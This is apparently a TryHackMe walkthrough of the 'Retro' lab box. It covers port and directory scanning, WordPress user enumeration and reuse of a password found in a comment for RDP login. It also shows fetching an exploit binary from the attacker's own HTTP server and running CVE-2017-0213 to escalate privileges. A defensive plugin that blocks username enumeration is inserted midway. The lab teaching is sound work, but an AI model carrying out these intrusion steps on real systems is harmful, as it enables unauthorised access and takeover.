Retro - TryHackMe Walkthrough
Retro - “New high score! Can you time travel? If not, you might want to think about the next best thing.” This is a TryHackMe box. To access this you must sign up to https://tryhackme.com/.
URL: Retro
Difficulty: Hard
Author: DarkStar7471
We are given the IP 10.10.120.163, add it to /etc/hosts and run a portscan:
nmap -p- -A retro.thm -oN portscan
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: RETROWEB
|   NetBIOS_Domain_Name: RETROWEB
|   NetBIOS_Computer_Name: RETROWEB
|   DNS_Domain_Name: RetroWeb
|   DNS_Computer_Name: RetroWeb
|   Product_Version: 10.0.14393
|_  System_Time: 2020-07-29T15:13:43+00:00
| ssl-cert: Subject: commonName=RetroWeb
| Not valid before: 2020-07-28T15:04:04
|_Not valid after:  2021-01-27T15:04:04
|_ssl-date: 2020-07-29T15:13:44+00:00; +1s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Check out port 80
What is the hidden directory which the website lives on?
Let’s run a dirbuster scan. The normal wordlist didn’t get any results so I used directory-list-2.3-medium.txt
Wordlist:
/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
Results:
We found a directory called Retro.
http://retro.thm/retro/
user.txt
We have more to enumerate. I saw some WordPress-related directories in our DirBuster scan, so let’s visit wp-admin to confirm.
The URL redirects us to
https://localhost/retro/wp-login.php?redirect_to=http%3A%2F%2Fretro.thm%2Fretro%2Fwp-admin%2F&reauth=1
Let’s add localhost to our hosts file:
sudo nano /etc/hosts
10.10.120.163 retro.thm localhost
Revisit the wp-admin page:
Let’s run WPScan:
wpscan --url http://retro.thm/retro -e u
This will scan the website and find possible users.
[i] User(s) Identified:

[+] wade
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://retro.thm/retro/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] Wade
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
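The WPScan output above shows exactly which exposures gave up the username: the author archive pattern, the wp-json users endpoint, the login error messages and the RSS feed's author field. The following must-use plugin is an added example, not part of this walkthrough or of the Retro box; it closes each of those paths on a WordPress site when dropped into wp-content/mu-plugins/ (the file name and plugin name are my own choice).

```php
<?php
/**
 * Plugin Name: Block username enumeration (added example)
 * Description: Closes the four disclosure paths WPScan used above.
 */

// 1. REST API: hide every /wp/v2/users route from visitors who are not logged in,
//    so GET /wp-json/wp/v2/users/?per_page=100 no longer lists accounts.
add_filter('rest_endpoints', function (array $endpoints): array {
    if (is_user_logged_in()) {
        return $endpoints;
    }
    foreach (array_keys($endpoints) as $route) {
        if (strpos($route, '/wp/v2/users') === 0) {
            unset($endpoints[$route]);
        }
    }
    return $endpoints;
});

// 2. Author pattern: /?author=N normally redirects to /author/<login>/, which
//    leaks the login name. Send such probes to the home page instead.
add_action('template_redirect', function (): void {
    $uri = $_SERVER['REQUEST_URI'] ?? '';
    if (isset($_GET['author']) || preg_match('#/author/#i', $uri)) {
        wp_safe_redirect(home_url('/'), 301);
        exit;
    }
});

// 3. Login errors: one generic message whether or not the user exists, so a
//    wrong password and an unknown username are indistinguishable.
add_filter('login_errors', function (): string {
    return 'Invalid username or password.';
});

// 4. RSS: the feed's dc:creator element is filled by the_author(); print the
//    site name there instead of the account's display name.
add_filter('the_author', function ($author) {
    return is_feed() ? get_bloginfo('name') : $author;
});
```

Hook 2 also disables public author archive pages, so leave it out on a site that needs them and rely on the other three.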
We’ve found Wade. The first result says it was found by Author posts so I began studying their content.
I saw that there was a comment made by Wade on one of his posts:
Here is the comment:
Leaving myself a note here just in case I forget how to spell it: parzival
Turns out this is the password for his account. Log into his account:
I looked for a bit but this seems to be a dead end. I looked up all the installed plugins, the WordPress version, etc., but found no obvious vulnerabilities.
What else could we do with these credentials? Maybe the other open port for RDP. Let’s try and connect using the following command:
xfreerdp /u:wade /p:parzival /v:retro.thm
We successfully got an RDP session:
The user flag is on the desktop.
root.txt
I saw the machine has Chrome installed, which is not there by default, so I checked whether I could find anything in it.
I saw this:
https://nvd.nist.gov/vuln/detail/CVE-2019-1388
I found this exploit:
Let’s download the .exe file to our local machine and set up an HTTP server so we can transfer it to the Windows machine.
For simplicity, I visited http://10.9.6.63:8080/ on Chrome and installed the binary.
I followed the steps but this didn’t lead me anywhere. Some further inspection of the Windows system:
C:\Users\Wade\Documents>systeminfo

Host Name:                 RETROWEB
OS Name:                   Microsoft Windows Server 2016 Standard
OS Version:                10.0.14393 N/A Build 14393
OS Manufacturer:           Microsoft Corporation
I researched a bit about OS 10.0.14393 N/A Build 14393 and also ran Windows Exploit Suggester:
Windows Exploit Suggester - Github
And I found this exploit:
So all we need to do is install CVE-2017-0213_x64.exe and run it on our target system.
Now run the executable (not from terminal) and you will be given a terminal with elevated privileges.
The last flag is in the admin’s Desktop directory. Thank you for reading.